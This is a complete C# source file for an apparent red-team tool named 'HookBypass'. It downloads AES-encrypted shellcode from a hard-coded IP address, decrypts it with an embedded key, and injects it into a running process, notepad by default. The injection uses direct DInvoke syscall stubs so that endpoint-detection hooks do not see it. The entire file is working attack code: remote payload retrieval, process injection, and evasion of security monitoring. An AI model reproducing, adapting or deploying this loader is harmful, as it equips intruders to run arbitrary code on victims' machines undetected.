using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using DInvoke.Data;
using DInvoke.DynamicInvoke;
using Native = DInvoke.Data.Native;
using Kernel32 = DInvoke.Data.Win32.Kernel32;
using WinNT = DInvoke.Data.Win32.WinNT;

namespace HookBypass
{
    
    public static class Loader
    {
        private const string ShellcodeUrl = "http://172.30.29.86/shellcode.enc";
        private const UInt32 StatusSuccess = 0;
        private const UInt32 ThreadAllAccess = 0x001FFFFF;

        // AES-256-CBC transport key/IV (generated by Encryptor.exe).
        // In a real engagement, derive these per-run and deliver via a separate channel.
        private static readonly byte[] Key =
        {
            0x08, 0x35, 0xe0, 0x46, 0x09, 0xbd, 0xf5, 0x1a, 0x3d, 0x38, 0x53, 0x44,
            0xf5, 0x41, 0xe3, 0x50, 0x54, 0x32, 0xcb, 0xec, 0xc0, 0xa9, 0x43, 0x95,
            0xdf, 0xb3, 0x41, 0xe4, 0x5b, 0xe5, 0xb2, 0x24
        };

        private static readonly byte[] Iv =
        {
            0xef, 0xf3, 0x56, 0x96, 0xb8, 0x5a, 0x57, 0x2b, 0x10, 0x74, 0xce, 0xa2,
            0x96, 0x3d, 0x43, 0x95
        };

        // ---- Native syscall delegates (direct syscalls via DInvoke stubs) ----

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate UInt32 NtOpenProcessDelegate(ref IntPtr processHandle, Kernel32.ProcessAccessFlags desiredAccess, ref Native.OBJECT_ATTRIBUTES objectAttributes, ref Native.CLIENT_ID clientId);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate UInt32 NtAllocateVirtualMemoryDelegate(IntPtr processHandle, ref IntPtr baseAddress, IntPtr zeroBits, ref IntPtr regionSize, UInt32 allocationType, UInt32 protect);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate UInt32 NtWriteVirtualMemoryDelegate(IntPtr processHandle, IntPtr baseAddress, IntPtr buffer, UInt32 bufferLength, ref UInt32 bytesWritten);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate UInt32 NtProtectVirtualMemoryDelegate(IntPtr processHandle, ref IntPtr baseAddress, ref IntPtr regionSize, UInt32 newProtect, ref UInt32 oldProtect);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate UInt32 NtCreateThreadExDelegate(out IntPtr threadHandle, UInt32 desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList);

        // DInvoke exposes no NtClose delegate; define it and resolve via GetSyscallStub.
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate UInt32 NtCloseDelegate(IntPtr handle);

        public static void Main(string[] args)
        {
            try
            {
                Environment.Exit(Run(args));
            }
            catch (Exception ex)
            {
                Console.Error.WriteLine("[-] Fatal: " + ex.Message);
                if (ex.InnerException != null)
                    Console.Error.WriteLine("    caused by: " + ex.InnerException.Message);
                Environment.Exit(1);
            }
        }

        private static int Run(string[] args)
        {
            int pid = -1;
            string localFile = null;

            for (int i = 0; i < args.Length; i++)
            {
                switch (args[i])
                {
                    case "--pid":
                        if (i + 1 >= args.Length) { Console.Error.WriteLine("[-] --pid requires a value"); return 2; }
                        pid = int.Parse(args[++i]);
                        break;
                    case "--file":
                        if (i + 1 >= args.Length) { Console.Error.WriteLine("[-] --file requires a value"); return 2; }
                        localFile = args[++i];
                        break;
                    default:
                        Console.Error.WriteLine("[-] Unknown argument: " + args[i]);
                        return 2;
                }
            }

            Console.WriteLine("[*] HookBypass loader starting");

            // ---- Fetch ----
            byte[] ciphertext = (localFile != null)
                ? File.ReadAllBytes(localFile)
                : DownloadShellcode(ShellcodeUrl);
            Console.WriteLine("[+] Fetched {0} bytes of encrypted shellcode", ciphertext.Length);

            // ---- Decrypt ----
            byte[] shellcode = AesDecrypt(ciphertext, Key, Iv);
            Console.WriteLine("[+] Decrypted {0} bytes, SHA256: {1}", shellcode.Length, Sha256Hex(shellcode));

            // ---- Inject ----
            IntPtr hProcess = IntPtr.Zero;
            IntPtr hThread = IntPtr.Zero;
            try
            {
                int targetPid = (pid >= 0) ? pid : SelectNotepadPid();
                Console.WriteLine("[*] Injecting into PID {0}", targetPid);

                hProcess = OpenProcess(targetPid);
                Console.WriteLine("[+] hProcess = 0x{0:X}", hProcess.ToInt64());

                IntPtr baseAddress = AllocateMemory(hProcess, shellcode.Length);
                Console.WriteLine("[+] Allocated 0x{0:X}", baseAddress.ToInt64());

                WriteMemory(hProcess, baseAddress, shellcode);
                Console.WriteLine("[+] Shellcode written to 0x{0:X}", baseAddress.ToInt64());

                ProtectMemory(hProcess, baseAddress, shellcode.Length);
                Console.WriteLine("[+] Region set to PAGE_EXECUTE_READ");

                hThread = CreateThread(hProcess, baseAddress);
                Console.WriteLine("[+] hThread = 0x{0:X}", hThread.ToInt64());

                Console.WriteLine("[+] Injection complete");
                return 0;
            }
            finally
            {
                if (hThread != IntPtr.Zero) CloseHandle(hThread);
                if (hProcess != IntPtr.Zero) CloseHandle(hProcess);
            }
        }

        private static T GetSyscall<T>(string name) where T : class
        {
            IntPtr stub = Generic.GetSyscallStub(name);
            if (stub == IntPtr.Zero)
                throw new InvalidOperationException("Failed to resolve syscall stub for " + name);
            T d = Marshal.GetDelegateForFunctionPointer(stub, typeof(T)) as T;
            if (d == null)
                throw new InvalidOperationException("Stub for " + name + " does not match the declared delegate signature");
            return d;
        }

        private static IntPtr OpenProcess(int pid)
        {
            var ntOpenProcess = GetSyscall<NtOpenProcessDelegate>("NtOpenProcess");

            Native.OBJECT_ATTRIBUTES oa = new Native.OBJECT_ATTRIBUTES();
            oa.Length = Marshal.SizeOf(typeof(Native.OBJECT_ATTRIBUTES));

            Native.CLIENT_ID cid = new Native.CLIENT_ID();
            cid.UniqueProcess = (IntPtr)pid;

            // Least privilege first: only what alloc/write/protect/create-thread need.
            Kernel32.ProcessAccessFlags minimal = Kernel32.ProcessAccessFlags.PROCESS_CREATE_THREAD | Kernel32.ProcessAccessFlags.PROCESS_QUERY_INFORMATION | Kernel32.ProcessAccessFlags.PROCESS_VM_OPERATION | Kernel32.ProcessAccessFlags.PROCESS_VM_WRITE | Kernel32.ProcessAccessFlags.PROCESS_VM_READ;

            IntPtr hProcess = IntPtr.Zero;
            UInt32 status = ntOpenProcess(ref hProcess, minimal, ref oa, ref cid);
            if (status != StatusSuccess)
            {
                Console.WriteLine("[!] NtOpenProcess(minimal) = 0x{0:X8}, retrying with PROCESS_ALL_ACCESS", status);
                status = ntOpenProcess(ref hProcess, Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS, ref oa, ref cid);
            }
            if (status != StatusSuccess)
                throw new InvalidOperationException(String.Format("NtOpenProcess failed, status 0x{0:X8}", status));
            return hProcess;
        }

        private static IntPtr AllocateMemory(IntPtr hProcess, int length)
        {
            var ntAlloc = GetSyscall<NtAllocateVirtualMemoryDelegate>("NtAllocateVirtualMemory");

            IntPtr baseAddress = IntPtr.Zero;
            IntPtr regionSize = (IntPtr)length; // kernel rounds up to page granularity via ref
            UInt32 status = ntAlloc(hProcess, ref baseAddress, IntPtr.Zero, ref regionSize, Kernel32.MEM_COMMIT | Kernel32.MEM_RESERVE, WinNT.PAGE_READWRITE);
            if (status != StatusSuccess)
                throw new InvalidOperationException(String.Format("NtAllocateVirtualMemory failed, status 0x{0:X8}", status));
            return baseAddress;
        }

        private static void WriteMemory(IntPtr hProcess, IntPtr baseAddress, byte[] payload)
        {
            var ntWrite = GetSyscall<NtWriteVirtualMemoryDelegate>("NtWriteVirtualMemory");

            IntPtr buffer = Marshal.AllocHGlobal(payload.Length);
            try
            {
                Marshal.Copy(payload, 0, buffer, payload.Length);
                UInt32 bytesWritten = 0;
                UInt32 status = ntWrite(hProcess, baseAddress, buffer, (UInt32)payload.Length, ref bytesWritten);
                if (status != StatusSuccess)
                    throw new InvalidOperationException(String.Format("NtWriteVirtualMemory failed, status 0x{0:X8}", status));
                if (bytesWritten != (UInt32)payload.Length)
                    throw new InvalidOperationException(String.Format("Short write: {0}/{1} bytes", bytesWritten, payload.Length));
            }
            finally
            {
                Marshal.FreeHGlobal(buffer);
            }
        }

        private static void ProtectMemory(IntPtr hProcess, IntPtr baseAddress, int length)
        {
            var ntProtect = GetSyscall<NtProtectVirtualMemoryDelegate>("NtProtectVirtualMemory");

            IntPtr regionSize = (IntPtr)length;
            UInt32 oldProtect = 0;
            UInt32 status = ntProtect(hProcess, ref baseAddress, ref regionSize, WinNT.PAGE_EXECUTE_READ, ref oldProtect);
            if (status != StatusSuccess)
                throw new InvalidOperationException(String.Format("NtProtectVirtualMemory failed, status 0x{0:X8}", status));
        }

        private static IntPtr CreateThread(IntPtr hProcess, IntPtr startAddress)
        {
            var ntCreateThreadEx = GetSyscall<NtCreateThreadExDelegate>("NtCreateThreadEx");

            IntPtr hThread;
            UInt32 status = ntCreateThreadEx(out hThread, ThreadAllAccess, IntPtr.Zero, hProcess, startAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
            if (status != StatusSuccess)
                throw new InvalidOperationException(String.Format("NtCreateThreadEx failed, status 0x{0:X8}", status));
            return hThread;
        }

        private static void CloseHandle(IntPtr handle)
        {
            try
            {
                var ntClose = GetSyscall<NtCloseDelegate>("NtClose");
                UInt32 status = ntClose(handle);
                if (status != StatusSuccess)
                    Console.WriteLine("[!] NtClose(0x{0:X}) = 0x{1:X8}", handle.ToInt64(), status);
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] NtClose failed: " + ex.Message);
            }
        }

        private static int SelectNotepadPid()
        {
            Process[] procs = Process.GetProcessesByName("notepad");
            if (procs == null || procs.Length == 0)
                throw new InvalidOperationException("No 'notepad' process found. Use --pid <processId> to target a specific process.");
            int pid = procs[0].Id;
            foreach (Process p in procs) p.Dispose();
            return pid;
        }

        private static byte[] DownloadShellcode(string url)
        {
            Console.WriteLine("[*] Downloading {0}", url);
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            request.Timeout = 30000;          // connect timeout
            request.ReadWriteTimeout = 30000; // read timeout
            request.UserAgent = "Mozilla/5.0";
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            {
                int code = (int)response.StatusCode;
                if (code < 200 || code >= 300)
                    throw new InvalidOperationException(String.Format("HTTP {0} ({1})", code, response.StatusDescription));
                using (Stream stream = response.GetResponseStream())
                using (MemoryStream ms = new MemoryStream())
                {
                    stream.CopyTo(ms);
                    if (ms.Length == 0)
                        throw new InvalidOperationException("Empty response body from " + url);
                    return ms.ToArray();
                }
            }
        }

        private static byte[] AesDecrypt(byte[] cipher, byte[] key, byte[] iv)
        {
            using (var aes = new RijndaelManaged())
            {
                aes.KeySize = 256;
                aes.BlockSize = 128;
                aes.Mode = CipherMode.CBC;
                aes.Padding = PaddingMode.PKCS7;
                aes.Key = key;
                aes.IV = iv;
                using (ICryptoTransform decryptor = aes.CreateDecryptor())
                    return decryptor.TransformFinalBlock(cipher, 0, cipher.Length);
            }
        }

        private static string Sha256Hex(byte[] data)
        {
            using (var sha = SHA256.Create())
            {
                byte[] hash = sha.ComputeHash(data);
                var sb = new StringBuilder(hash.Length * 2);
                foreach (byte b in hash) sb.Append(b.ToString("x2"));
                return sb.ToString();
            }
        }
    }
}
